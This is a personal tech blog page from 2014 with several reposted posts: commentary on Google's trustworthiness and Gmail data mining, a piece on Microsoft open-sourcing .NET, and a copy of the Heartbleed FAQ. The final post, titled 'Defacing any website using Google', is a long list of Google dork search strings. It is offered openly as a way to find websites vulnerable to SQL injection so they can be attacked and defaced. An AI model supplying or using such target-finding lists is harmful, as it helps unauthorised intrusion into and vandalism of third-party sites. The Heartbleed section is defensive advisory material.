Wednesday, April 16, 2014

IS GOOGLE TOO BIG TO TRUST: THE CREDIBILITY GAP


Remember when we all loved Google? Its search engine was both simple to use and an unbiased portal to anything you wanted to know. It was founded by two college students at a time when Silicon Valley was a shining beacon of what was right in the world, during sunny economic and political times.

We don't love Google so much any more, mainly because we trust it less and less, i wrote an article on google's dark side that has gotten almost all of us. More and more people have realized that the Google search engine is hugely biased in favor of advertisers, and the results are increasingly manipulated by Google for inscrutable purposes. Google seems to track anything and everything we do -- it peruses our emails, our files stored on its servers, our locations, and our chats. Americans are getting nervous.

[ They all do it: Welcome to the new world of perpetual spying [2]. | Subscribe to InfoWorld's Consumerization of IT newsletter [3] today. ]
When Google bought smart thermostat maker Nest [4] earlier this year, the public recoiled -- Nest owners didn't want their thermometers to be the latest spying portal in their homes for Google to use. That negative reaction drove home the growing Google trust problem. Likewise, no one really believed that Google wasn't participating in the NSA's spying on users; it seemed a clear case of the lady doth protest too much. Plus, we saw how much Google is spying on us, whether or not in support of the NSA. If anything, Google's response seemed to be indignation that the NSA was piggybacking on Google's own privacy-mining efforts.

For most people, Google is still a shining star. It ranks as the second-most valuable brand in the world [6], after Apple and before Coca-Cola, a ranking that has grown in recent years. It's also at the top of the rankings for best places to work [7]. It's not as if Google has yet become Facebook, whose abuse of personal information is assumed [8]. But the cracks in Google's reputation are growing.

Consider Google's recent policy update for the Google Play Store [9], which is where you get Android and Chrome OS apps. The latest policies forbid apps that mislead users into buying add-ins, releasing their personal data, or going to websites -- common techniques for dubious advertisers and vendors, as well as cyber criminals.
But will Google enforce these policies? Google didn't respond to InfoWorld's query on the matter, but its past actions suggest it will not, other than occasionally as a sort of spring cleaning [10]. Google has long had a hands-off approach to apps, doing little to weed out malware and other abusive apps. It trusted app makers to do the right thing.

Ironically, Google's own search engine would fail some of those new Play Store policies -- you can't always tell what search-result links you click are sponsored [11] versus neutral, and many of the advertised links lead to scam sites that surreptitiously steal user information. Google also plays games with the unsponsored search results, favoring content from people and organizations with active Google+ accounts, for example. Google Search and the Play Store are becoming more and more like Craigslist, the pioneering, once-virtuous online classified-ads system that now is a seedy venue favored by scammers for finding new victims.

The reality is that Google's business is and has always been about mining as much data as possible to be able to present information to users. After all, it can't display what it doesn't know. Google Search has always been an ad-supported service, so it needs a way to sell those users to advertisers -- that's how the industry works. Its Google Now voice-based service is simply a form of Google Search, so it too serves advertisers' needs.
In the digital world, advertisers want to know more than the 100,000 people who might be interested in buying a new car. They now want to know who those people are, so they can reach out to them with custom messages that are more likely to be effective. They may not know you personally, but they know your digital persona -- basically, you. Google needs to know about you to satisfy its advertisers' demands.
Once you understand that, you understand why Google does what it does. That's simply its business. Nothing is free, so if you won't pay cash, you'll have to pay with personal information. That business model has been around for decades; Google didn't invent that business model, but Google did figure out how to make it work globally, pervasively, appealingly, and nearly instantaneously.

I don't blame Google for doing that, but I blame it for being nontransparent. Putting unmarked sponsored ads in the "regular" search results section is misleading, because people have been trained by Google to see that section of the search results as neutral. They are in fact not. Once you know that, you never quite trust Google search results again. (Yes, Bing's results are similarly tainted. But Microsoft never promised to do no evil, and most people use Google.)

The issue gets trickier when you move away from search and into apps, whether Chrome OS or Android. Free apps are what people want, so app makers end up doing the same data-mining that sustains Google Search, using a shadowy network of companies [12] to do the work for them. The result is that many mobile apps have the same kind of scams you see on the Web [13]. Sometimes Google is in that mix (innocently, or at least not looking too hard), sometimes it is not. That's why opt-in permissions and clear disclosure are necessary -- so you don't feel fooled.

But many paid apps use these same services to increase their income -- you may think by paying for the app or an in-app extension, your data and behavior are not being mined. But they often are, typically without your knowledge. That's extra income for the app maker, as well as the data miners they work with. Or it supports an artficially low price that drew your interest in the first place. If a deal seems too good to be true ...
Google is hardly alone in plying this murky data-mining trade. But it's the largest visible company in that business, so it's an easy, obvious target for distrust -- and user wrath. Many of us have given up on Facebook ever being honest [14], so we're looking at Google as the next line to hold.

Also, Google was a very optimistic, idealistic company in its youth. It really did want to change the world for the better, and it believed in freeing information for all as a way to empower individuals. It believed its early "do no evil" motto. It really did see Android as a way to democratize smartphones, which until then were the province of the well-to-do who could afford BlackBerrys or iPhones. Yes, making Android freely available also created a large footprint for Google's services, so its moves were hardly selfless -- but they were oriented toward doing greater good while making money, a virtuous business approach.
Google employees still believe that's how their company works: a force for good that harmlessly uses personal data to both help individuals and make money that supports its many activities and innovations.

But as time goes on, the mercantile needs are coloring the do-gooder impulses. Google is a public company, and it has to satisfy shareholders' desire for profits every quarter. That creates a tension between its reputation and its economic reality. By sweeping that tension under the rug, Google only creates a place for distrust to grow. We can all see that the old Google is not the current Google, and the pretense that it is only heightens our suspicions.
It's time for Google to admit what it does and to act consistently on its policies (or withdraw policies it doesn't intend to enforce). That honesty will help stem the loss of trust. People know that companies exist to make money, but they need to know the true relationship they're entering and don't end up feeling misled. We all know the promises that the banks, airlines, insurance companies, cellular providers, and cable companies make aren't real, and they routinely mislead us on pricing and services -- so we don't trust them. Does Google really want to be like those industries?
Trust comes from honesty, and the key to honesty is to be forthright. Google doesn't seem to understand that yet.

Read more here

THE DARK SIDE OF GOOGLE YOU NEVER KNEW: WAS IN GMAIL

http://www.thedarksideofgoogle.com/title.jpg



I recently wrote about Google’s Street View program, and how after a series of investigations in the US and Europe, we learned that Google had used its Street View cars to carry out a covert — and certainly illegal — espionage operation on a global scale, siphoning loads of personally identifiable data from people’s Wi-Fi connections all across the world. Emails, medical records, love notes, passwords, the whole works — anything that wasn’t encrypted was fair game. It was all part of the original program design: Google had equipped its Street View cars with surveillance gear designed to intercept and vacuum up all the wireless network communication data that crossed their path. An FCC investigation showing that the company knowingly deployed Street View’s surveillance program, and then had analyzed and integrated the data that it had intercepted.


We know where you are. We know where you’ve been. We can more or less know what you’re thinking about.”
“Your digital identity will live forever… because there’s no delete button.” —Eric Schmidt

Most disturbingly, when its Street View surveillance program was uncovered by regulators, Google pulled every crisis management trick in the book to confuse investors, dodge questions, avoid scrutiny, and prevent the public from finding out the truth. The company’s behavior got so bad that the FCC fined it for obstruction of justice.

The investigation in Street View uncovered a dark side to Google. But as alarming as it was, Google’s Street View wiretapping scheme was just a tiny experimental program compared Google’s bread and butter: a massive surveillance operation that intercepts and analyzes terabytes of global Internet traffic every day, and then uses that data to build and update complex psychological profiles on hundreds of millions of people all over the world — all of it in real time. You’ve heard about this program. You probably interact with it every day. You call it Gmail.

Google launched Gmail in 2004. It was the company’s first major “log in” service and was aimed at poaching email users from Microsoft and Yahoo. To do that, Google offered one gigabyte of free storage space standard with every account. It was an insane amount of data at the time — at least several hundred times more space than what was being offered by Yahoo or Hotmail — and people signed up en masse. At one point, Gmail’s limited pre-public release invites were so desirable that at one point they fetched over $150 on eBay.

To tech reporters Gmail’s free email service was nothing short of revolutionary. New York Times tech columnist David Pogue wrote: “One gigabyte changes everything. You no longer live in terror that somebody will send you a photo, thereby exceeding your two-megabyte limit and making all subsequent messages bounce back to their senders.”

And what about the fact that Gmail scanned your email correspondence to deliver targeted ads?

Well, what of it?

Gmail users handed over all their personal correspondence to Google, giving the company to right to scan, analyze, and retain in perpetuity their correspondence in return for a gigabyte of storage, which even at that early stage already cost Google only $2 per gigabyte per year.

Selling the contents of our private and business life to a for-profit corporation in return for half a Big Mac a year? What a steal!

You’d be hard pressed to find a bum who’d sell out to Google that cheap. But most mainstream tech journalist weren’t that scrupulous, and lined up to boost Gmail to the public.

“The only population likely not to be delighted by Gmail are those still uncomfortable with those computer-generated ads. Those people are free to ignore or even bad-mouth Gmail, but they shouldn’t try to stop Google from offering Gmail to the rest of us. We know a good thing when we see it,” wrote Pogue in 2004.

But not everyone was as excited as Mr. Pogue.

Several privacy groups, including the Electronic Privacy Information Center, were alarmed by Gmail’s vast potential for privacy abuse. In particular, EPIC was concerned that Google was not restricting its email scanning activities solely to its registered user base, but was intercepting and analyzing the private communication of anyone who emailed with a Gmail user:

“Gmail violates the privacy rights of non-subscribers. Non-subscribers who e-mail a Gmail user have ‘content extraction’ performed on their e-mail even though they have not consented to have their communications monitored, nor may they even be aware that their communications are being analyzed,” EPIC explained at the time. The organization pointed out that this practice almost certainly violates California wiretapping statues — which expressly criminalizes the interception of electronic communication without consent of all parties involved.

What spooked EPIC even more: Google was not simply scanning people’s emails for advertising keywords, but had developed underlying technology to compile sophisticated dossiers of everyone who came through its email system. All communication was subject to deep linguistic analysis; conversations were parsed for keywords, meaning and even tone; individuals were matched to real identities using contact information stored in a user’s Gmail address book; attached documents were scraped for intel — that info was then cross-referenced with previous email interactions and combined with stuff gleamed from other Google services, as well as third-party sources…

Here’s are some of the things that Google would use to construct its profiles, gleamed from two patents company filed prior to launching its Gmail service:

    Concepts and topics discussed in email, as well as email attachments
    The content of websites that users have visited
    Demographic information — including income, sex, race, marital status
    Geographic information
    Psychographic information — personality type, values, attitudes, interests and lifestyle interests
    Previous searches users have made
    Information about documents a user viewed and or edited by the users
    Browsing activity
    Previous purchases

To EPIC, Google’s interception and use of such detailed personal information was clearly violation of California law, and the organization called on California’s Attorney General promised to investigate Google’s Gmail service. The Attorney General promise to look into the matter, but nothing much happened.

Meanwhile, Gmail’s user base continued to rocket. As of this month, there are something like 425 million active users around the world using email services. Individuals, schools, universities, companies, government employees, non-profits — and it’s not just Gmail anymore.

After its runaway success with Gmail, Google aggressively expanded its online presence, buying up smaller tech companies and deploying a staggering number of services and apps. In just a few years, Google had suddenly become ubiquitous, inserting themselves into almost every aspect of our lives: We search through Google, browse the Web through Google, write in Google, store our files in Google and use Google to drive and take public transport. Hell, even our mobile phones run on Google.

All these services might appear disparate and unconnected. To the uninitiated, Google’s offering of free services — from email, to amazing mobile maps, to a powerful replacement for Microsoft Office — might seem like charity. Why give away this stuff for free? But to think that way is to miss the fundamental purpose that Google serves and why it can generate nearly $20 billion in profits a year.

The Google services and apps that we interact with on a daily basis aren’t the company’s main product: They are the harvesting machines that dig up and process the stuff that Google really sells: for-profit intelligence.

Google isn’t a traditional Internet service company. It isn’t even an advertising company. Google is a whole new type of beast: a global advertising-intelligence company that tries to funnel as much user activity in the real and online world through its services in order to track, analyze and profile us: it tracks as much of our daily lives as possible — who we are, what we do, what we like, where we go, who we talk to, what we think about, what we’re interested in — all those things are seized, packaged, commodified and sold on the market — at this point, most of the business comes from matching the right ad to the right eyeballs. But who knows how the massive database Google’s compiling on all of us will be used in the future.

No wonder that when Google first rolled out Gmail in 2004, cofounder Larry Page refused to rule out that the company would never combine people’s search and browsing history with their Gmail account profiles: “It might be really useful for us to know that information. I’d hate to rule anything like that out.” Indeed it was. Profitable, too.

It’s been almost a decade since Google launched its Gmail service, but the fundamental questions about the legality of the company’s surveillance operations first posed by EPIC have not been resolved.

Indeed, a class action lawsuit currently winding its way through California federal court system shows that we’ve not moved an inch.

The complaint — a consolidation of six separate class action lawsuits that had been filed against Google in California, Florida, Illinois, Maryland and Pennsylvania — accuses Google of illegally intercepting, reading and profiting off people’s private correspondence without compensation. The lawsuit directly challenges Google’s legal right to indiscriminately vacuum up people’s data without clear consent, and just might be the biggest threat Google has ever faced.

Here’s how the New York Times described the case:

    Wiretapping is typically the stuff of spy dramas and shady criminal escapades. But now, one of the world’s biggest Web companies, Google, must defend itself against accusations that it is illegally wiretapping in the course of its everyday business — gathering data about Internet users and showing them related ads.

    …The Gmail case involves Google’s practice of automatically scanning e-mail messages and showing ads based on the contents of the e-mails. The plaintiffs include voluntary Gmail users, people who have to use Gmail as part of an educational institution and non-Gmail users whose messages were received by a Gmail user. They say the scanning of the messages violates state and federal antiwiretapping laws.

Google has aggressively fought the lawsuit. It first convinced a judge to put it under seal — which redacted most of the complaint and made it unavailable to public scrutiny — and then made a series of disingenuous arguments in an attempt to get the get the lawsuit preemptively dismissed. Google’s attorneys didn’t dispute its for-profit surveillance activities. What they claimed was that intercepting and analyzing electronic communication, and using that information to build sophisticated psychological profiles, was no different than scanning emails for viruses or spam. And then they made a stunning admission, arguing that as far as Google saw it, people who used Internet services for communication had “no legitimate expectation of privacy” — and thus anyone who emailed with Gmail users had given “implied consent” for Google to intercept and analyze their email exchange.

No expectation of privacy? Implied consent for surveillance?

Google’s claims were transparently disingenuous, and Judge Lucy Koh rejected them out of hand and allowed the lawsuit to proceed.

Unfortunately, it’s difficult to comment on or analyze the contents of the class action lawsuit filed against Google, as the company redacted just about all of it. One thing is clear: the complaint goes beyond simple wiretapping and brings into question an even bigger concern: Who owns the digital personal information about our lives — our thoughts, ideas, interactions, personal secrets, preferences, desires and hopes? And can all these things be seized bit by bit, analyzed, packaged, commodified and then bought and sold on the market like any other good? Can Google do that? What rights do we have over our inner lives? It’s scary and crazy. Especially when you think kids born today: Their entire lives will be digitally surveilled, recorded, analyzed, stored somewhere and then passed around from company to company. What happens to that information?

What happens to all this data in the future should be of serious concern. Not only because, with the right warrant (or in many cases without) the data is available to law enforcement. But also because in the unregulated hands of Google, our aggregated psychological profiles are an extremely valuable asset that could end us used for almost anything.

EPIC points out that Google reservers the right to “transfer all of the information, including any profiles created, if and when it is merged or sold.” How do we know that information won’t end up in some private background check database that’ll be available to your boss? How do we know this information won’t be hacked or stolen and won’t fall into the hands of scammers and repressive dictators?

The answer is: We don’t. And these tech companies would rather keep us in the dark and not caring.

Google’s corporate leadership understands that increased privacy regulations could torpedo its entire business model and the company takes quite a lot of space on its SEC filing disclosing the dangers to its investors:

    Privacy concerns relating to elements of our technology could damage our reputation and deter current and potential users from using our products and services…

    We also face risks from legislation that could be passed in the future. For example, there is a risk that state legislatures will attempt to regulate the automated scanning of email messages in ways that interfere with our Gmail free advertising-supported web mail service. Any such legislation could make it more difficult for us to operate or could prohibit the aspects of our Gmail service that uses computers to match advertisements to the content of a user’s email message when email messages are viewed using the service. This could prevent us from implementing the Gmail service in any affected states and impair our ability to compete in the email services market…

Former Google CEO Eric Schmidt has not been shy about his company’s views on Internet privacy: People don’t have any, nor should they expect it. “If you have something that you don’t want anyone to know, maybe you shouldn’t be doing it in the first place,” he infamously told CNBC in 2009. And he’s right. Because true Internet privacy and real surveillance reform would be the end of Google.

And not just Google, but nearly every major consumer Silicon Valley company — all of them feed people’s personal data one way or another and depend on for-profit surveillance for survival.

Which brings me to Silicon Valley’s “Reform Government Surveillance” project.

The fact that the biggest, most data-hungry companies in Silicon Valley joined up in a cynical effort to shift attention away from their own for-profit surveillance operations and blame it all on big bad government is to be expected. What’s surprising is just how many supposed journalists and so-called privacy advocates fell for it.

Yasha Levine is a roving correspondent at Pando Daily. Visit his website at yashalevine.com.

Friday, April 11, 2014

MICROSOFT LAUNCHES FREE OPEN SOURCE OS AN RELEASES SOURCE CODE FOR .NET

Microsoft hasn't been very open, but under new management of CEO Satya Nadella, the company might be heading towards the open direction like, Google's open source 
This was gotten from CNET NEWS, MICROSOFT'S JOURNEY TO AN OPEN SOURCE .NET

Microsoft's decision to open-source more of its .Net platform didn't happen overnight, or even in the past few weeks. It was a move years in the making.
Microsoft's vision for the future of .Net.
Microsoft's vision for the future of .Net. Microsoft
Microsoft's move to open source key chunks of its .Net platform, a software framework that developers can use to build Windows applications, was one of the biggest announcements at Microsoft's Build 2014 show last week.
I've seen a number of Microsoft watchers and users postulating that this move is proof that newly minted CEO Satya Nadella is taking the company in directions that former CEO Steve Ballmer and his leadership team never would have dared go. That's a nice, neat story. But it just isn't true.
(Ditto with the decision to roll out Office for the iPad before "Gemini" touch-first Office for Windows. Word is that decision also predated Nadella's appointment as CEO.)

msftbuild-526.jpg
Microsoft CEO Satya Nadella James Martin/CNET
Soma Somasegar, the corporate vice president of Microsoft's Developer Division, told me during an interview at Build 2014 last week that the work around open-sourcing more of .Net began three years ago.
Somasegar said management was aware that Microsoft hadn't embraced open source in needed ways. The thinking was that Microsoft should start out by open-sourcing higher levels of the .Net Framework at first, and then consider gradually moving down the stack. But there were debates about whether Microsoft should actually take contributions from the community, as is expected under most, if not all, open-source licenses -- or simply make the code available for viewing but not modification.
Mobile-tool maker Xamarin, with whom Microsoft was partnering (rather than fighting/fearing, as some inside the company did initially) was a key advisor, Somasegar said. Some inside Microsoft were initially leery of Xamarin's goal to help .Net developers write apps that worked on Android and iOS because those platforms competed with Windows. But over time, Microsoft became more friend than foe to Xamarin -- so much so that rumors are continuing to swirl that Microsoft may be negotiating to buy Xamarin. (At Build last week, neither Microsoft nor Xamarin officials would confirm or quash those rumors.)
Xamarin officials never pressured Microsoft to open-source .Net, Somasegar said. However, they did "influence us around getting the community involved," he said. Xamarin did want more information about .Net interfaces and related documentation, Somasegar acknowledged.
Among the .Net technologies that Microsoft is open-sourcing is its "Roslyn" compiler, which is the foundation for future versions of Visual Basic and C#. Microsoft's announcement last week means all future iterations of these compilers will be open-sourced under an Apache 2.0 license.
A year ago, Somasegar said he began talking with Microsoft Distinguished Engineer and Roslyn lead Anders Hejlsberg about whether and when Microsoft should make Roslyn available as open source. In the fall of 2013, the decision was made to open-source Roslyn once it was in preview/end-user shape (which happened last week) and to accept contributions from the community, Somasegar said. Somasegar championed the idea of creating a separate foundation,the .Net Foundation, dedicated to overseeing the new open-sourcing effort.
Somasegar said he spoke to Nadella a year ago, when he was still heading up Microsoft's Server and Tools business (prior to becoming CEO) about the Developer Division's interest in making more of .Net open source.
"He (Nadella) said back then, if you think this is good for devs, go do it," Somasegar said.
Scott Guthrie, who is now the executive vice president in charge of Microsoft's Cloud and Enterprise business, also was a key proponent of the idea from way back, Somasegar confirmed.

So will Microsoft take the next step and open-source the core of .Net, including the Base Class Libraries (BCL) and Common Language Runtime (CLR)?

"We are taking it one step at a time," said Somasegar. "If it's truly beneficial for us and for the community," Microsoft will consider it, Somasegar said. But there has to be a proven need, he emphasized. For example, Microsoft provided Xamarin with the BCL documentation late last week given that company's proven need for it.

I have to admit that I wasn't sure if Microsoft's decision to open-source more of .Net would be met by cheers or jeers by those attending Build last week. I was curious if developers might see the move as an indicator that Microsoft no longer considered .Net valuable enough to keep in-house as part of its collection of crown jewels. Most of the devs with whom I spoke at the show seemed upbeat about the move, however.

Hejlsberg told attendees of a press panel during Build that Microsoft is not abandoning .Net.
"We are actively investing in .Net going forward," Hejlsberg said, in response to an audience question as to whether Microsoft was putting .Net on the back burner.
"It's not going away," Hejlsberg said. "We are all in on .Net."

SSL/TLS COMPROMISED HOW TO FIX OPEN SOURCE OPENSSL HEARTBLEED BUG

Recently a bug was found in the popular cryptographic software library Openssl
This information was gotten from the official documentation on Heartbleed.com

The Heartbleed Bug

The Heartbleed Bug is a serious vulnerability in the popular OpenSSL cryptographic software library. This weakness allows stealing the information protected, under normal conditions, by the SSL/TLS encryption used to secure the Internet. SSL/TLS provides communication security and privacy over the Internet for applications such as web, email, instant messaging (IM) and some virtual private networks (VPNs).
The Heartbleed bug allows anyone on the Internet to read the memory of the systems protected by the vulnerable versions of the OpenSSL software. This compromises the secret keys used to identify the service providers and to encrypt the traffic, the names and passwords of the users and the actual content. This allows attackers to eavesdrop on communications, steal data directly from the services and users and to impersonate services and users.

What leaks in practice?

We have tested some of our own services from attacker's perspective. We attacked ourselves from outside, without leaving a trace. Without using any privileged information or credentials we were able steal from ourselves the secret keys used for our X.509 certificates, user names and passwords, instant messages, emails and business critical documents and communication.

How to stop the leak?

As long as the vulnerable version of OpenSSL is in use it can be abused. Fixed OpenSSL has been released and now it has to be deployed. Operating system vendors and distribution, appliance vendors, independent software vendors have to adopt the fix and notify their users. Service providers and users have to install the fix as it becomes available for the operating systems, networked appliances and software they use.

Q&A

What is the CVE-2014-0160?

CVE-2014-0160 is the official reference to this bug. CVE (Common Vulnerabilities and Exposures) is the Standard for Information Security Vulnerability Names maintained by MITRE. Due to co-incident discovery a duplicate CVE, CVE-2014-0346, which was assigned to us, should not be used, since others independently went public with the CVE-2014-0160 identifier.

To test if your server is affected by the bug Run Test here, or visit the repo, to be aware

Why it is called the Heartbleed Bug?

Bug is in the OpenSSL's implementation of the TLS/DTLS (transport layer security protocols) heartbeat extension (RFC6520). When it is exploited it leads to the leak of memory contents from the server to the client and from the client to the server.

What makes the Heartbleed Bug unique?

Bugs in single software or library come and go and are fixed by new versions. However this bug has left large amount of private keys and other secrets exposed to the Internet. Considering the long exposure, ease of exploitation and attacks leaving no trace this exposure should be taken seriously.

Is this a design flaw in SSL/TLS protocol specification?

No. This is implementation problem, i.e. programming mistake in popular OpenSSL library that provides cryptographic services such as SSL/TLS to the applications and services.

What is being leaked?

Encryption is used to protect secrets that may harm your privacy or security if they leak. In order to coordinate recovery from this bug we have classified the compromised secrets to four categories: 1) primary key material, 2) secondary key material and 3) protected content and 4) collateral.

What is leaked primary key material and how to recover?

These are the crown jewels, the encryption keys themselves. Leaked secret keys allows the attacker to decrypt any past and future traffic to the protected services and to impersonate the service at will. Any protection given by the encryption and the signatures in the X.509 certificates can be bypassed. Recovery from this leak requires patching the vulnerability, revocation of the compromised keys and reissuing and redistributing new keys. Even doing all this will still leave any traffic intercepted by the attacker in the past still vulnerable to decryption. All this has to be done by the owners of the services.

What is leaked secondary key material and how to recover?

These are for example the user credentials (user names and passwords) used in the vulnerable services. Recovery from this leaks requires owners of the service first to restore trust to the service according to steps described above. After this users can start changing their passwords and possible encryption keys according to the instructions from the owners of the services that have been compromised. All session keys and session cookies should be invalided and considered compromised.

What is leaked protected content and how to recover?

This is the actual content handled by the vulnerable services. It may be personal or financial details, private communication such as emails or instant messages, documents or anything seen worth protecting by encryption. Only owners of the services will be able to estimate the likelihood what has been leaked and they should notify their users accordingly. Most important thing is to restore trust to the primary and secondary key material as described above. Only this enables safe use of the compromised services in the future.

What is leaked collateral and how to recover?

Leaked collateral are other details that have been exposed to the attacker in the leaked memory content. These may contain technical details such as memory addresses and security measures such as canaries used to protect against overflow attacks. These have only contemporary value and will lose their value to the attacker when OpenSSL has been upgraded to a fixed version.

Recovery sounds laborious, is there a short cut?

After seeing what we saw by "attacking" ourselves, with ease, we decided to take this very seriously. We have gone laboriously through patching our own critical services and are in progress of dealing with possible compromise of our primary and secondary key material. All this just in case we were not first ones to discover this and this could have been exploited in the wild already.

How revocation and reissuing of certificates works in practice?

If you are a service provider you have signed your certificates with a Certificate Authority (CA). You need to check your CA how compromised keys can be revoked and new certificate reissued for the new keys. Some CAs do this for free, some may take a fee.

visit heartbleed for more information

Saturday, March 22, 2014

DEFACING ANY WEBSITE USING GOOGLE

HERE ARE JUST A FEW GOOGLE DORKS THAT CAN BE USED FOR SQL INJECTIONS
THIS POST IS NOT FOR NEWBIES ON THE INTERNET, ONLY FOR THOSE WHO UNDERSTAND WHAT SQL INJECTIONS ARE AND HOW THEY ARE USED. . 


aftr 6line ad dis at d end
 you can find vuln. site and you are ready to Sql injection.
PHP DORK
inurl:(0x3a,version
inurl@version,0x3a,databse)
inurl:(user,0x3a,pass)
inurl:+union+select+ from
inurl:+union+select+ pass
inurl:+union+select+ SHOP
inurl:+union+select+ admin
inurl:index.php?id=
inurl:trainers.php?id=
inurl:buy.php?category=
inurl:article.php?ID=
inurl:play_old.php?id=
inurl:declaration_more.php?decl_id=
inurl:pageid=
inurl:games.php?id=
inurl:page.php?file=
inurl:newsDetail.php?id=
inurl:gallery.php?id=
inurl:article.php?id=
inurl:show.php?id=
inurl:staff_id=
inurl:newsitem.php?num=
inurl:readnews.php?id=
inurl:top10.php?cat=
inurl:historialeer.php?num=
inurl:reagir.php?num=
inurl:Stray-Questions-View.php?num=
inurl:forum_bds.php?num=
inurl:game.php?id=
inurl:view_product.php?id=
inurl:newsone.php?id=
inurl:sw_comment.php?id=
inurl:news.php?id=
inurl:avd_start.php?avd=
inurl:event.php?id=
inurl:product-item.php?id=
inurl:sql.php?id=
inurl:news_view.php?id=
inurl:select_biblio.php?id=
inurl:humor.php?id=
inurl:aboutbook.php?id=
inurl:ogl_inet.php?ogl_id=
inurl:fiche_spectacle.php?id=
inurl:communique_detail.php?id=
inurl:sem.php3?id=
inurl:kategorie.php4?id=
inurl:news.php?id=
inurl:index.php?id=
inurl:faq2.php?id=
inurl:show_an.php?id=
inurl:preview.php?id=
inurl:loadpsb.php?id=
inurl:opinions.php?id=
inurl:spr.php?id=
inurl:pages.php?id=
inurl:announce.php?id=
inurl:clanek.php4?id=
inurl:participant.php?id=
inurl:download.php?id=
inurl:main.php?id=
inurl:review.php?id=
inurl:chappies.php?id=
inurl:read.php?id=
inurl:prod_detail.php?id=
inurl:viewphoto.php?id=
inurl:article.php?id=
inurl:person.php?id=
inurl:productinfo.php?id=
inurl:showimg.php?id=
inurl:view.php?id=
inurl:website.php?id=
inurl:hosting_info.php?id=
inurl:gallery.php?id=
inurl:rub.php?idr=
inurl:view_faq.php?id=
inurl:artikelinfo.php?id=
inurl:detail.php?ID=
inurl:index.php?=
inurl:profile_view.php?id=
inurl:category.php?id=
inurl:publications.php?id=
inurl:fellows.php?id=
inurl:downloads_info.php?id=
inurl:prod_info.php?id=
inurl:shop.php?do=part&id=
inurl:productinfo.php?id=
inurl:collectionitem.php?id=
inurl:band_info.php?id=
inurl:product.php?id=
inurl:releases.php?id=
inurl:ray.php?id=
inurl:produit.php?id=
inurl:pop.php?id=
inurl:shopping.php?id=
inurl:productdetail.php?id=
inurl:post.php?id=
inurl:viewshowdetail.php?id=
inurl:clubpage.php?id=
inurl:memberInfo.php?id=
inurl:section.php?id=
inurl:theme.php?id=
inurl:page.php?id=
inurl:shredder-categories.php?id=
inurl:tradeCategory.php?id=
inurl:product_ranges_view.php?ID=
inurl:shop_category.php?id=
inurl:transcript.php?id=
inurl:channel_id=
inurl:item_id=
inurl:newsid=
inurl:trainers.php?id=
inurl:news-full.php?id=
inurl:news_display.php?getid=
inurl:index2.php?option=
inurl:readnews.php?id=
inurl:top10.php?cat=
inurl:newsone.php?id=
inurl:event.php?id=
inurl:product-item.php?id=
inurl:sql.php?id=
inurl:aboutbook.php?id=
inurl:preview.php?id=
inurl:loadpsb.php?id=
inurl:pages.php?id=
inurl:material.php?id=
inurl:clanek.php4?id=
inurl:announce.php?id=
inurl:chappies.php?id=
inurl:read.php?id=
inurl:viewapp.php?id=
inurl:viewphoto.php?id=
inurl:rub.php?idr=
inurl:galeri_info.php?l=
inurl:review.php?id=
inurl:iniziativa.php?in=
inurl:curriculum.php?id=
inurl:labels.php?id=
inurl:story.php?id=
inurl:look.php?ID=
inurl:newsone.php?id=
inurl:aboutbook.php?id=
inurl:material.php?id=
inurl:opinions.php?id=
inurl:announce.php?id=
inurl:rub.php?idr=
inurl:galeri_info.php?l=
inurl:tekst.php?idt=
inurl:newscat.php?id=
inurl:newsticker_info.php?idn=
inurl:rubrika.php?idr=
inurl:rubp.php?idr=
inurl:offer.php?idf=
inurl:art.php?idm=
inurl:title.php?id=
inurl:recruit_details.php?id=
inurl:index.php?cPath=
ASP DORK
nurl:”add.asp?bookid=”
inurl:”add_cart.asp?num=”
inurl:”addcart.asp?”
inurl:”addItem.asp”
inurl:”add-to-cart.asp?ID=”
inurl:”addToCart.asp?idProduct=”
inurl:”addtomylist.asp?ProdId=”
inurl:”adminEditProductFields.asp?intProdID=”
inurl:”advSearch_h.asp?idCategory=”
inurl:”affiliate.asp?ID=”
inurl:”affiliate-agreement.cfm?storeid=”
inurl:”affiliates.asp?id=”
inurl:”ancillary.asp?ID=”
inurl:”archive.asp?id=”
inurl:”article.asp?id=”
inurl:”aspx?PageID”
inurl:”basket.asp?id=”
inurl:”Book.asp?bookID=”
inurl:”book_list.asp?bookid=”
inurl:”book_view.asp?bookid=”
inurl:”BookDetails.asp?ID=”
inurl:”browse.asp?catid=”
inurl:”browse_item_details.asp”
inurl:”Browse_Item_Details.asp?Store_Id=”
inurl:”buy.asp?”
inurl:”buy.asp?bookid=”
inurl:”bycategory.asp?id=”
inurl:”cardinfo.asp?card=”
inurl:”cart.asp?action=”
inurl:”cart.asp?cart_id=”
inurl:”cart.asp?id=”
inurl:”cart_additem.asp?id=”
inurl:”cart_validate.asp?id=”
inurl:”cartadd.asp?id=”
inurl:”cat.asp?iCat=”
inurl:”catalog.asp”
inurl:”catalog.asp?CatalogID=”
inurl:”catalog_item.asp?ID=”
inurl:”catalog_main.asp?catid=”
inurl:”category.asp”
inurl:”category.asp?catid=”
inurl:”category_list.asp?id=”
inurl:”categorydisplay.asp?catid=”
inurl:”checkout.asp?cartid=”
inurl:”checkout.asp?UserID=”
inurl:”checkout_confirmed.asp?order_id=”
inurl:”checkout1.asp?cartid=”
inurl:”comersus_listCategoriesAndProducts.asp?idCategory =”
inurl:”comersus_optEmailToFriendForm.asp?idProduct=”
inurl:”comersus_optReviewReadExec.asp?idProduct=”
inurl:”comersus_viewItem.asp?idProduct=”
inurl:”comments_form.asp?ID=”
inurl:”contact.asp?cartId=”
inurl:”content.asp?id=”
inurl:”customerService.asp?TextID1=”
inurl:”default.asp?catID=”
inurl:”description.asp?bookid=”
inurl:”details.asp?BookID=”
inurl:”details.asp?Press_Release_ID=”
inurl:”details.asp?Product_ID=”
inurl:”details.asp?Service_ID=”
inurl:”display_item.asp?id=”
inurl:”displayproducts.asp”
inurl:”downloadTrial.asp?intProdID=”
inurl:”emailproduct.asp?itemid=”
inurl:”emailToFriend.asp?idProduct=”
inurl:”events.asp?ID=”
inurl:”faq.asp?cartID=”
inurl:”faq_list.asp?id=”
inurl:”faqs.asp?id=”
inurl:”feedback.asp?title=”
inurl:”freedownload.asp?bookid=”
inurl:”fullDisplay.asp?item=”
inurl:”getbook.asp?bookid=”
inurl:”GetItems.asp?itemid=”
inurl:”giftDetail.asp?id=”
inurl:”help.asp?CartId=”
inurl:”home.asp?id=”
inurl:”index.asp?cart=”
inurl:”index.asp?cartID=”
inurl:”index.asp?ID=”
inurl:”info.asp?ID=”
inurl:”item.asp?eid=”
inurl:”item.asp?item_id=”
inurl:”item.asp?itemid=”
inurl:”item.asp?model=”
inurl:”item.asp?prodtype=”
